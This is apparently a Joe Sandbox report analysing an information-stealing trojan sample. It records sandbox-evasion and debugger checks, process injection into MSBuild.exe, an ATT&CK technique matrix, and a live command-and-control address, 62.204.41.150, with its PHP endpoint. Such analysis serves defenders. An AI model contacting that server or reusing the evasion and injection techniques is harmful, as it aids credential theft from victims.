                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Aew8SXjXEb.exeAPI coverage: 4.2 %
                        Source: C:\Users\user\Desktop\Aew8SXjXEb.exeCode function: 0_2_00639ABF FindFirstFileExW,0_2_00639ABF
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_00401160 GetSystemInfo,1_2_00401160
                        Source: Amcache.hve.6.drBinary or memory string: VMware
                        Source: Amcache.hve.6.drBinary or memory string: VMware Virtual USB Mouse
                        Source: Amcache.hve.6.drBinary or memory string: vmci.syshbin
                        Source: Amcache.hve.6.drBinary or memory string: VMware-42 27 c5 9a 47 85 d6 84-53 49 ec ec 87 a6 6d 67
                        Source: Amcache.hve.6.drBinary or memory string: VMware, Inc.
                        Source: Amcache.hve.6.drBinary or memory string: VMware20,1hbin@
                        Source: Amcache.hve.6.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                        Source: Amcache.hve.6.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                        Source: Amcache.hve.6.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                        Source: MSBuild.exe, 00000001.00000002.1494298167.00000000013F1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                        Source: Amcache.hve.6.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                        Source: Amcache.hve.6.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                        Source: Amcache.hve.6.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                        Source: Amcache.hve.6.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                        Source: Amcache.hve.6.drBinary or memory string: vmci.sys
                        Source: Amcache.hve.6.drBinary or memory string: vmci.syshbin`
                        Source: Amcache.hve.6.drBinary or memory string: \driver\vmci,\driver\pci
                        Source: Amcache.hve.6.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                        Source: Amcache.hve.6.drBinary or memory string: VMware20,1
                        Source: Amcache.hve.6.drBinary or memory string: Microsoft Hyper-V Generation Counter
                        Source: Amcache.hve.6.drBinary or memory string: NECVMWar VMware SATA CD00
                        Source: Amcache.hve.6.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                        Source: MSBuild.exe, 00000001.00000002.1494298167.0000000001397000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                        Source: Amcache.hve.6.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                        Source: Amcache.hve.6.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                        Source: Amcache.hve.6.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                        Source: Amcache.hve.6.drBinary or memory string: VMware PCI VMCI Bus Device
                        Source: MSBuild.exe, 00000001.00000002.1494298167.0000000001397000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMwareP
                        Source: Amcache.hve.6.drBinary or memory string: VMware VMCI Bus Device
                        Source: Amcache.hve.6.drBinary or memory string: VMware Virtual RAM
                        Source: Amcache.hve.6.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                        Source: MSBuild.exe, 00000001.00000002.1494298167.0000000001397000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW@
                        Source: Amcache.hve.6.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                        Source: C:\Users\user\Desktop\Aew8SXjXEb.exeProcess queried: DebugPortJump to behavior
                        Source: C:\Users\user\Desktop\Aew8SXjXEb.exeProcess queried: DebugPortJump to behavior
                        Source: C:\Users\user\Desktop\Aew8SXjXEb.exeCode function: 0_2_00627922 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00627922
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_004045C0 VirtualProtect ?,00000004,00000100,000000001_2_004045C0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0041C03D LoadLibraryW,GetProcAddress,GetProcAddress,EncodePointer,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,1_2_0041C03D
                        Source: C:\Users\user\Desktop\Aew8SXjXEb.exeCode function: 0_2_00622003 mov edi, dword ptr fs:[00000030h]0_2_00622003
                        Source: C:\Users\user\Desktop\Aew8SXjXEb.exeCode function: 0_2_0063A64C mov eax, dword ptr fs:[00000030h]0_2_0063A64C
                        Source: C:\Users\user\Desktop\Aew8SXjXEb.exeCode function: 0_2_00666628 mov eax, dword ptr fs:[00000030h]0_2_00666628
                        Source: C:\Users\user\Desktop\Aew8SXjXEb.exeCode function: 0_2_00630F2E mov ecx, dword ptr fs:[00000030h]0_2_00630F2E
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_00419750 mov eax, dword ptr fs:[00000030h]1_2_00419750
                        Source: C:\Users\user\Desktop\Aew8SXjXEb.exeCode function: 0_2_0063CC4B GetProcessHeap,0_2_0063CC4B
                        Source: C:\Users\user\Desktop\Aew8SXjXEb.exeCode function: 0_2_00627610 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00627610
                        Source: C:\Users\user\Desktop\Aew8SXjXEb.exeCode function: 0_2_00627922 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00627922
                        Source: C:\Users\user\Desktop\Aew8SXjXEb.exeCode function: 0_2_0062DA73 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0062DA73
                        Source: C:\Users\user\Desktop\Aew8SXjXEb.exeCode function: 0_2_00627AAF SetUnhandledExceptionFilter,0_2_00627AAF
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0041AD48 memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_0041AD48
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0041CEEA SetUnhandledExceptionFilter,1_2_0041CEEA
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0041B33A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_0041B33A
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory protected: page guardJump to behavior

                        HIPS / PFW / Operating System Protection Evasion

                        barindex
                        Source: Yara matchFile source: Process Memory Space: Aew8SXjXEb.exe PID: 6032, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 2332, type: MEMORYSTR
                        Source: C:\Users\user\Desktop\Aew8SXjXEb.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 protect: page execute and read and writeJump to behavior
                        Source: C:\Users\user\Desktop\Aew8SXjXEb.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 value starts with: 4D5AJump to behavior
                        Source: C:\Users\user\Desktop\Aew8SXjXEb.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000Jump to behavior
                        Source: C:\Users\user\Desktop\Aew8SXjXEb.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 401000Jump to behavior
                        Source: C:\Users\user\Desktop\Aew8SXjXEb.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 41E000Jump to behavior
                        Source: C:\Users\user\Desktop\Aew8SXjXEb.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 42B000Jump to behavior
                        Source: C:\Users\user\Desktop\Aew8SXjXEb.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 65C000Jump to behavior
                        Source: C:\Users\user\Desktop\Aew8SXjXEb.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: EF7008Jump to behavior
                        Source: C:\Users\user\Desktop\Aew8SXjXEb.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"Jump to behavior
                        Source: C:\Users\user\Desktop\Aew8SXjXEb.exeCode function: GetACP,IsValidCodePage,GetLocaleInfoW,0_2_0063C085
                        Source: C:\Users\user\Desktop\Aew8SXjXEb.exeCode function: GetLocaleInfoW,0_2_0063622B
                        Source: C:\Users\user\Desktop\Aew8SXjXEb.exeCode function: EnumSystemLocalesW,0_2_0063C372
                        Source: C:\Users\user\Desktop\Aew8SXjXEb.exeCode function: EnumSystemLocalesW,0_2_0063C327
                        Source: C:\Users\user\Desktop\Aew8SXjXEb.exeCode function: EnumSystemLocalesW,0_2_0063C40D
                        Source: C:\Users\user\Desktop\Aew8SXjXEb.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,0_2_0063C498
                        Source: C:\Users\user\Desktop\Aew8SXjXEb.exeCode function: GetLocaleInfoW,0_2_0063C6EB
                        Source: C:\Users\user\Desktop\Aew8SXjXEb.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_0063C814
                        Source: C:\Users\user\Desktop\Aew8SXjXEb.exeCode function: GetLocaleInfoW,0_2_0063C91A
                        Source: C:\Users\user\Desktop\Aew8SXjXEb.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_0063C9E9
                        Source: C:\Users\user\Desktop\Aew8SXjXEb.exeCode function: EnumSystemLocalesW,0_2_00635D7F
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Aew8SXjXEb.exeCode function: 0_2_00627815 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00627815
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_00417850 GetUserNameA,1_2_00417850
                        Source: Amcache.hve.6.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                        Source: Amcache.hve.6.drBinary or memory string: msmpeng.exe
                        Source: Amcache.hve.6.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                        Source: Amcache.hve.6.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
                        Source: Amcache.hve.6.drBinary or memory string: MsMpEng.exe

                        Stealing of Sensitive Information

                        barindex
                        Source: Yara matchFile source: 0.2.Aew8SXjXEb.exe.64dad8.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 1.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.Aew8SXjXEb.exe.64dad8.2.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 1.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.Aew8SXjXEb.exe.620000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000001.00000002.1493810804.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000001.00000002.1494298167.0000000001397000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.1544221013.000000000064D000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 2332, type: MEMORYSTR
                        Source: Yara matchFile source: dump.pcap, type: PCAP

                        Remote Access Functionality

                        barindex
                        Source: Yara matchFile source: 0.2.Aew8SXjXEb.exe.64dad8.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 1.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.Aew8SXjXEb.exe.64dad8.2.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 1.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.Aew8SXjXEb.exe.620000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000001.00000002.1493810804.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000001.00000002.1494298167.0000000001397000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.1544221013.000000000064D000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 2332, type: MEMORYSTR
                        Source: Yara matchFile source: dump.pcap, type: PCAP
                        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                        Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
                        Native API
                        1
                        DLL Side-Loading
                        311
                        Process Injection
                        1
                        Masquerading
                        OS Credential Dumping1
                        System Time Discovery
                        Remote Services1
                        Archive Collected Data
                        12
                        Encrypted Channel
                        Exfiltration Over Other Network MediumAbuse Accessibility Features
                        CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
                        DLL Side-Loading
                        1
                        Virtualization/Sandbox Evasion
                        LSASS Memory41
                        Security Software Discovery
                        Remote Desktop ProtocolData from Removable Media2
                        Ingress Tool Transfer
                        Exfiltration Over BluetoothNetwork Denial of Service
                        Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
                        Disable or Modify Tools
                        Security Account Manager1
                        Virtualization/Sandbox Evasion
                        SMB/Windows Admin SharesData from Network Shared Drive2
                        Non-Application Layer Protocol
                        Automated ExfiltrationData Encrypted for Impact
                        Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook311
                        Process Injection
                        NTDS1
                        Account Discovery
                        Distributed Component Object ModelInput Capture13
                        Application Layer Protocol
                        Traffic DuplicationData Destruction
                        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                        Deobfuscate/Decode Files or Information
                        LSA Secrets1
                        System Owner/User Discovery
                        SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
                        Obfuscated Files or Information
                        Cached Domain Credentials1
                        File and Directory Discovery
                        VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                        Software Packing
                        DCSync23
                        System Information Discovery
                        Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                        Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                        DLL Side-Loading
                        Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                        Hide Legend

                        Legend:

                        • Process
                        • Signature
                        • Created File
                        • DNS/IP Info
                        • Is Dropped
                        • Is Windows Process
                        • Number of created Registry Values
                        • Number of created Files
                        • Visual Basic
                        • Delphi
                        • Java
                        • .Net C# or VB.NET
                        • C, C++ or other language
                        • Is malicious
                        • Internet

                        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                        windows-stand
                        SourceDetectionScannerLabelLink
                        Aew8SXjXEb.exe32%ReversingLabsWin32.Trojan.Generic
                        Aew8SXjXEb.exe100%AviraHEUR/AGEN.1310458
                        Aew8SXjXEb.exe100%Joe Sandbox ML
                        No Antivirus matches
                        No Antivirus matches
                        No Antivirus matches
                        SourceDetectionScannerLabelLink
                        http://upx.sf.net0%URL Reputationsafe
                        NameIPActiveMaliciousAntivirus DetectionReputation
                        bg.microsoft.map.fastly.net
                        199.232.214.172
                        truefalse
                          unknown
                          s-part-0044.t-0009.fb-t-msedge.net
                          13.107.253.72
                          truefalse
                            unknown
                            fp2e7a.wpc.phicdn.net
                            192.229.221.95
                            truefalse
                              unknown
                              NameMaliciousAntivirus DetectionReputation
                              http://62.204.41.150/true
                                unknown
                                http://62.204.41.150/edd20096ecef326d.phptrue
                                  unknown
                                  NameSourceMaliciousAntivirus DetectionReputation
                                  http://62.204.41.150/LMSBuild.exe, 00000001.00000002.1494298167.00000000013D6000.00000004.00000020.00020000.00000000.sdmpfalse
                                    unknown
                                    http://62.204.41.150igMSBuild.exe, 00000001.00000002.1494298167.0000000001397000.00000004.00000020.00020000.00000000.sdmpfalse
                                      unknown
                                      http://62.204.41.150/edd20096ecef326d.php0MSBuild.exe, 00000001.00000002.1494298167.00000000013D6000.00000004.00000020.00020000.00000000.sdmpfalse
                                        unknown
                                        http://62.204.41.150/SMSBuild.exe, 00000001.00000002.1494298167.0000000001397000.00000004.00000020.00020000.00000000.sdmpfalse
                                          unknown
                                          http://62.204.41.150/edd20096ecef326d.php;MSBuild.exe, 00000001.00000002.1494298167.00000000013D6000.00000004.00000020.00020000.00000000.sdmpfalse
                                            unknown
                                            http://62.204.41.150/YMSBuild.exe, 00000001.00000002.1494298167.00000000013D6000.00000004.00000020.00020000.00000000.sdmpfalse
                                              unknown
                                              http://62.204.41.150/edd20096ecef326d.php5MSBuild.exe, 00000001.00000002.1494298167.00000000013D6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                unknown
                                                http://62.204.41.150/edd20096ecef326d.phpuMSBuild.exe, 00000001.00000002.1494298167.00000000013D6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  unknown
                                                  http://62.204.41.150/zMSBuild.exe, 00000001.00000002.1494298167.00000000013D6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    unknown
                                                    http://62.204.41.150GMSBuild.exe, 00000001.00000002.1494298167.0000000001397000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      unknown
                                                      http://upx.sf.netAmcache.hve.6.drfalse
                                                      • URL Reputation: safe
                                                      unknown
                                                      http://62.204.41.150MSBuild.exe, 00000001.00000002.1494298167.0000000001397000.00000004.00000020.00020000.00000000.sdmptrue
                                                        unknown
                                                        http://62.204.41.150/edd20096ecef326d.phpx&MSBuild.exe, 00000001.00000002.1494298167.00000000013F1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          unknown
                                                          http://62.204.41.150EMSBuild.exe, 00000001.00000002.1494298167.00000000013D6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            unknown
                                                            http://62.204.41.150/edd20096ecef326d.phpiMSBuild.exe, 00000001.00000002.1494298167.00000000013D6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              unknown
                                                              http://62.204.41.150/JMSBuild.exe, 00000001.00000002.1494298167.00000000013D6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                unknown
                                                                http://62.204.41.150/edd20096ecef326d.phpoca.MSBuild.exe, 00000001.00000002.1494298167.00000000013D6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  unknown
                                                                  • No. of IPs < 25%
                                                                  • 25% < No. of IPs < 50%
                                                                  • 50% < No. of IPs < 75%
                                                                  • 75% < No. of IPs
                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                  62.204.41.150
                                                                  unknownUnited Kingdom
                                                                  30798TNNET-ASTNNetOyMainnetworkFItrue
                                                                  Joe Sandbox version:41.0.0 Charoite
                                                                  Analysis ID:1528328
                                                                  Start date and time:2024-10-07 19:32:10 +02:00
                                                                  Joe Sandbox product:CloudBasic
                                                                  Overall analysis duration:0h 5m 6s
                                                                  Hypervisor based Inspection enabled:false
                                                                  Report type:full
                                                                  Cookbook file name:default.jbs
                                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                  Number of analysed new started processes analysed:14
                                                                  Number of new started drivers analysed:0
                                                                  Number of existing processes analysed:0
                                                                  Number of existing drivers analysed:0
                                                                  Number of injected processes analysed:0
                                                                  Technologies:
                                                                  • HCA enabled
                                                                  • EGA enabled
                                                                  • AMSI enabled
                                                                  Analysis Mode:default
                                                                  Analysis stop reason:Timeout
                                                                  Sample name:Aew8SXjXEb.exe
                                                                  renamed because original name is a hash value
                                                                  Original Sample Name:c89c82ab6576a83a2a32bbffe44ef4d7.exe
                                                                  Detection:MAL
                                                                  Classification:mal100.troj.evad.winEXE@4/5@0/1
                                                                  EGA Information:
                                                                  • Successful, ratio: 100%
                                                                  HCA Information:
                                                                  • Successful, ratio: 98%
                                                                  • Number of executed functions: 20
                                                                  • Number of non-executed functions: 71
                                                                  Cookbook Comments:
                                                                  • Found application associated with file extension: .exe
                                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                  • Excluded IPs from analysis (whitelisted): 20.190.160.17, 40.126.32.76, 20.190.160.20, 40.126.32.74, 20.190.160.14, 40.126.32.68, 40.126.32.72, 40.126.32.134, 2.16.164.97, 2.16.164.105, 192.229.221.95, 20.42.73.29, 52.149.20.212, 2.23.209.181, 2.23.209.154, 2.23.209.160, 2.23.209.183, 2.23.209.176, 2.23.209.177, 2.23.209.158, 2.23.209.150, 2.23.209.182, 13.85.23.206, 52.165.164.15, 2.23.209.149, 2.23.209.135, 2.23.209.179, 2.23.209.141, 199.232.214.172, 93.184.221.240
                                                                  • Excluded domains from analysis (whitelisted): crl.edge.digicert.com, azurefd-t-fb-prod.trafficmanager.net, slscr.update.microsoft.com, otelrules.afd.azureedge.net, a767.dspw65.akamai.net, wu.azureedge.net, e86303.dscx.akamaiedge.net, ocsp.digicert.com, www.bing.com.edgekey.net, login.live.com, ocsp.edge.digicert.com, onedsblobprdeus15.eastus.cloudapp.azure.com, glb.cws.prod.dcat.dsp.trafficmanager.net, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, sls.update.microsoft.com, hlb.apr-52dd2-0.edgecastdns.net, wu-b-net.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net, www.bing.com, prdv4a.aadg.msidentity.com, ctldl.windowsupdate.com.delivery.microsoft.com, otelrules.azureedge.net, www.tm.v4.a.prd.aadg.akadns.net, wu.ec.azureedge.net, ctldl.windowsupdate.com, www-www.bing.com.trafficmanager.net, login.msa.msidentity.com, download.windowsupdate.com.edgesuite.net, fe3cr.delivery.mp.microsoft.com, fe3.delivery.mp.microsoft.com, blobcollector.events.data.trafficmanager.net, azureedge-t-prod.traffic
                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                  • VT rate limit hit for: Aew8SXjXEb.exe
                                                                  TimeTypeDescription
                                                                  13:33:20API Interceptor1x Sleep call for process: WerFault.exe modified
                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                  62.204.41.150RJQySowVRb.exeGet hashmaliciousStealcBrowse
                                                                  • 62.204.41.150/edd20096ecef326d.php
                                                                  1f13Cs1ogc.exeGet hashmaliciousStealcBrowse
                                                                  • 62.204.41.150/edd20096ecef326d.php
                                                                  5rVhexjLCx.exeGet hashmaliciousStealcBrowse
                                                                  • 62.204.41.150/edd20096ecef326d.php
                                                                  file.exeGet hashmaliciousStealcBrowse
                                                                  • 62.204.41.150/edd20096ecef326d.php
                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                  fp2e7a.wpc.phicdn.nethttps://dsdhie.org/dsjhemGet hashmaliciousUnknownBrowse
                                                                  • 192.229.221.95
                                                                  TuQlz67byH.exeGet hashmaliciousLummaCBrowse
                                                                  • 192.229.221.95
                                                                  f1r6P3j3g7.exeGet hashmaliciousLummaC, VidarBrowse
                                                                  • 192.229.221.95
                                                                  lCVFGKfczi.exeGet hashmaliciousVidarBrowse
                                                                  • 192.229.221.95
                                                                  1f13Cs1ogc.exeGet hashmaliciousStealcBrowse
                                                                  • 192.229.221.95
                                                                  NdSXVNeoET.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                  • 192.229.221.95
                                                                  VLSiVR4Qxs.exeGet hashmaliciousLummaC, VidarBrowse
                                                                  • 192.229.221.95
                                                                  5rVhexjLCx.exeGet hashmaliciousStealcBrowse
                                                                  • 192.229.221.95
                                                                  https://forms.office.com/Pages/ShareFormPage.aspx?id=W8eUhlA4rUOuklSyoCn21mtmgAvPzYFJuSM99R6gX3dUQ1IyWUM1UUhTS1pWQ0xXNkI3RzlRRkFIVi4u&sharetoken=93tGEOrxpFy3X0nnxFcrGet hashmaliciousHTMLPhisherBrowse
                                                                  • 192.229.221.95
                                                                  file.exeGet hashmaliciousVidarBrowse
                                                                  • 192.229.221.95
                                                                  bg.microsoft.map.fastly.netAdobe-Setup.msiGet hashmaliciousKorplugBrowse
                                                                  • 199.232.210.172
